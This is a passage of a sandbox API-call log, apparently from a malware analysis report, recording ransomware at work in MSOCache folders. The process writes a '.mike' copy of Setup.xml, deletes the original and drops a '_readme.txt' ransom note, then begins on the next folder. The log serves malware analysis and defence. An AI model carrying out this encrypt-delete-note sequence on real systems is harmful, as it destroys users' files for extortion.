ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f)) returned 1 [0040.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.017] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.018] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.018] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.018] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.018] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.018] GetFileType (hFile=0x264) returned 0x1 [0040.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.018] GetFileType (hFile=0x264) returned 0x1 [0040.018] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.018] WriteFile (in: hFile=0x264, lpBuffer=0x221c57c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x221c57c*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.019] CloseHandle (hObject=0x264) returned 1 [0040.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.019] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x221c084 | out: lpFileInformation=0x221c084*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f)) returned 1 [0040.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.019] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.019] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.020] GetFileType (hFile=0x264) returned 0x1 [0040.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.020] GetFileType (hFile=0x264) returned 0x1 [0040.020] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.020] ReadFile (in: hFile=0x264, lpBuffer=0x221d6a4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x221d6a4*, lpNumberOfBytesRead=0x2af110*=0x106f, lpOverlapped=0x0) returned 1 [0040.053] CloseHandle (hObject=0x264) returned 1 [0040.054] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.054] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.054] GetFileType (hFile=0x264) returned 0x1 [0040.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.054] GetFileType (hFile=0x264) returned 0x1 [0040.054] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.054] WriteFile (in: hFile=0x264, lpBuffer=0x2225628*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2225628*, lpNumberOfBytesWritten=0x2af124*=0x1070, lpOverlapped=0x0) returned 1 [0040.054] CloseHandle (hObject=0x264) returned 1 [0040.055] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.055] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.055] GetFileType (hFile=0x264) returned 0x1 [0040.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.055] GetFileType (hFile=0x264) returned 0x1 [0040.056] WriteFile (in: hFile=0x264, lpBuffer=0x22289f0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22289f0*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.056] CloseHandle (hObject=0x264) returned 1 [0040.057] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.057] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.057] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20f46e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20f46e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21409a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1290)) returned 1 [0040.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.057] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.058] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.058] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x222a16c | out: lpFileInformation=0x222a16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20f46e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20f46e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21409a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1290)) returned 1 [0040.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.058] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.058] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.058] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.058] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.059] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.059] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.059] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.059] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.059] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.060] GetFileType (hFile=0x264) returned 0x1 [0040.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.060] GetFileType (hFile=0x264) returned 0x1 [0040.060] WriteFile (in: hFile=0x264, lpBuffer=0x222be50*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x222be50*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.061] CloseHandle (hObject=0x264) returned 1 [0040.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.061] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.061] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.061] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe20f46e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21409a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe20f46e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21409a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0040.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0040.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20ce580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20ce580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe20ce580, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.xml.mike", cAlternateFileName="OUTLOO~1.MIK")) returned 1 [0040.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20f46e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20f46e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21409a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1290, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20ce580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20ce580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21409a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.063] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20ce580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20ce580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21409a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.063] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.063] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.063] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.063] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.063] CoTaskMemFree (pv=0x4fe370) [0040.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.063] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.064] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.064] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.064] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.072] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.072] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.072] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, 